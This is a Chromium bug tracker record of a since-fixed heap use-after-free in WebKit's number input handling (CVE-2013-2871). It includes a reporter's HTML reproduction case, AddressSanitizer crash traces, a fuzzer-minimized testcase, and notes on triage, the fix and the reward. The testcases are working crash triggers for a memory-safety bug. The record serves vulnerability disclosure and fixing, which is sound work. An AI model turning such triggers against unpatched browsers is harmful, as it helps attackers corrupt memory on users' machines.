Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Issue 243991 Heap-use-after-free in WebCore::InputType::stepUpFromRenderer
Starred by 1 user Reported by miau...@gmail.com, May 25 2013 Back to list
Status: Fixed
Owner:
Closed: May 2013
Cc:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: ----
Type: Bug-Security



Sign in to add a comment


VULNERABILITY DETAILS
use-after-free in WebCore::InputType::stepUpFromRenderer(int)

VERSION
Chrome Version: stable+dev
Operating System: linux 64bit, osx

REPRODUCTION CASE

USER INTERACTION REQUIRED: you must press up or down arrows when the input is focused.

<html>
  <head>
    <script>
      onload = function() {
        el0=document.createElement('input')
        el0.type='number'
        document.body.appendChild(el0)
        window.addEventListener('change', function(){ el0.type='' }, false)
        el0.focus()
        }
      </script>
      </head>
     <body>
       press Up or Down arrows
    </body>
  </html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==13639== ERROR: AddressSanitizer: heap-use-after-free on address 0x600e00010558 at pc 0x7f4008e8a1f9 bp 0x7fffc75e1a90 sp 0x7fffc75e1a88
READ of size 8 at 0x600e00010558 thread T0 (asan-stable)
    #0 0x7f4008e8a1f8 in element /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WebCore/html/InputType.h:317:0
    #1 0x7f4008e8a1f8 in WebCore::InputType::stepUpFromRenderer(int) /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WebCore/html/InputType.cpp:1117:0
    #2 0x7f4008eae704 in WebCore::TextFieldInputType::handleKeydownEventForSpinButton(WebCore::KeyboardEvent*) /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WebCore/html/TextFieldInputType.cpp:161:0
    #3 0x7f4008ea07a1 in WebCore::NumberInputType::handleKeydownEvent(WebCore::KeyboardEvent*) 

0x600e00010558 is located 8 bytes inside of 72-byte region [0x600e00010550,0x600e00010598)
freed by thread T0 (asan-stable) here:
    #0 0x7f4006f23462 in free ??:0
    #1 0x7f4008dfba26 in deleteOwnedPtr<WebCore::InputType> /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WTF/wtf/OwnPtrCommon.h:63:0
    #2 0x7f4008dfba26 in operator= /mnt/scratch0/tmpbuild/src/out/Release/../../third_party/WebKit/Source/WTF/wtf/OwnPtr.h:141:0
    #3 0x7f4008dfba26 in WebCore::HTMLInputElement::updateType() 


 
872.txt
23.0 KB View Download
872.html
367 bytes View Download
Comment 1 by miau...@gmail.com, May 25 2013
stable asan log
stable872.txt
21.2 KB View Download
Cc: keishi@chromium.org yosin@chromium.org ksakamoto@chromium.org
Owner: tkent@chromium.org
Status: Assigned
These input element event handle type change bugs are sprouting all the place. Please help to kill this madness.
Comment 3 by tkent@chromium.org, May 27 2013
Labels: Security_Impact-Stable Security_Impact-Beta M-27
Status: Started
Comment 4 by tkent@chromium.org, May 27 2013
This is a regression by http://trac.webkit.org/changeset/94658

Labels: Security_Severity-High OS-All Stability-Memory-AddressSanitizer
We caught in our fuzzers as well. 
Summary: Heap-use-after-free in WebCore::InputType::stepUpFromRenderer (was: Security: use-after-free in WebCore::InputType::stepUpFromRenderer(int))
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=188312355

Fuzzer: Inferno_layout_test_fuzzer

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x607000094e58
Crash State:
  - crash stack -
  WebCore::InputType::stepUpFromRenderer
  WebCore::TextFieldInputType::handleKeydownEventForSpinButton
  - free stack -
  WebCore::HTMLInputElement::updateType
  WebCore::HTMLInputElement::parseAttribute
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=137694:137702

Minimized Testcase (0.44 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv96aAPoAfiQ64Bx2C2kjvL1CtWDPoLvTF3sKUHhy_z9cyI8pmwm-Ed-i5vgizLTj4ENbjMmFvSawmQwZ5jNJI0uCcWieYQJrl7HjZ4sZg71aSfEouk_U8LyzL_Wory4Fy7quFrDR_9WMkZ0J0JajQDvUR76FrQ
<input type="number" onchange="handleChange(this);">
<script>
function sendKey(keyName) {
    var event = document.createEvent('KeyboardEvent');
    event.initKeyboardEvent('keydown', true, true, document.defaultView, keyName);
    document.activeElement.dispatchEvent(event);
}

function handleChange(element) {
    element.type = '';
}

var numberInput = document.getElementsByTagName('input')[0];
numberInput.focus();
sendKey('Up');

</script>
>
Labels: Security-Code28
Project Member Comment 8 by clusterf...@chromium.org, May 28 2013
ClusterFuzz has detected this issue as fixed in range 202382:202420.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=188312355

Fuzzer: Inferno_layout_test_fuzzer

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x607000094e58
Crash State:
  - crash stack -
  WebCore::InputType::stepUpFromRenderer
  WebCore::TextFieldInputType::handleKeydownEventForSpinButton
  - free stack -
  WebCore::HTMLInputElement::updateType
  WebCore::HTMLInputElement::parseAttribute
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=137694:137702
Fixed: https://cluster-fuzz.appspot.com/revisions?range=202382:202420

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96aAPoAfiQ64Bx2C2kjvL1CtWDPoLvTF3sKUHhy_z9cyI8pmwm-Ed-i5vgizLTj4ENbjMmFvSawmQwZ5jNJI0uCcWieYQJrl7HjZ4sZg71aSfEouk_U8LyzL_Wory4Fy7quFrDR_9WMkZ0J0JajQDvUR76FrQ

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: Fixed
https://src.chromium.org/viewvc/blink?view=rev&revision=151175
Labels: -M-27 -Merge-Approved M-28 Merge-Merged Release-0 reward-topanel
M28: r152059
Labels: -reward-topanel reward-unpaid reward-1000
$1000 for this one. Thanks again!

*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties.
*********************************
Labels: CVE-2013-2871
Labels: -reward-unpaid reward-inprocess
Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Labels: -reward-inprocess
Project Member Comment 16 by clusterf...@chromium.org, Feb 2 2016
Labels: -Security_Impact-Beta
Project Member Comment 17 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 18 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment